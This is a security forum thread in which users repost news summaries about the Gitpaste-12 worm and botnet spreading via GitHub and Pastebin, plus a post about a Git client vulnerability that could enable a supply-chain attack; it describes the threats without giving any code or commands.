Reverse shell botnet Gitpaste-12 spreads via GitHub and Pastebin

Correlate

Level 16
Verified
May 4, 2019
721
A newly discovered worm and botnet named Gitpaste-12 lives on GitHub and also uses Pastebin to host malicious code.

The advanced malware comes equipped with reverse shell and crypto-mining capabilities and exploits over 12 known vulnerabilities, therefore the moniker.
 

Correlate

Level 16
Verified
May 4, 2019
721
This post is a rather unusual story of a vulnerability that could be leveraged as a supply chain attack and used to attack millions of software developers around the world. It is also a tale of a bug collision that paid a bounty to one reporter and assigned the CVE to another!

The main focus of this blog post is GitHub Desktop. Other Git clients such as GitKraken, Git-Tower and SourceTree were also found to be vulnerable, however these have different exploitation scenarios that require user interaction.
 

silversurfer

Level 68
Verified
Trusted
Content Creator
Malware Hunter
Aug 17, 2014
5,757
Researchers at Juniper Threat Labs observed the second iteration of Gitpaste-12 on November 10th 2020, present on a different GitHub repository.
Expanding on its predecessor, this new version of Gitpaste-12 comes equipped with over 30 vulnerability exploits, concerning Linux systems, IoT devices, and open-source components.
Initially, the researchers observed the new GitHub repository containing just 3 files.
"The wave of attacks used payloads from yet another GitHub repository, which contained a Linux cryptominer ('ls'), a list of passwords for brute-force attempts ('pass') and a statically linked Python 3.9 interpreter of unknown provenance," explains Asher Langton, a researcher at Juniper Threat Labs. [...]
The complete research findings and a list of Gitpaste-12 Indicators of Compromise (IOCs) can be found in Juniper Threat Labs' blog post.
 
Top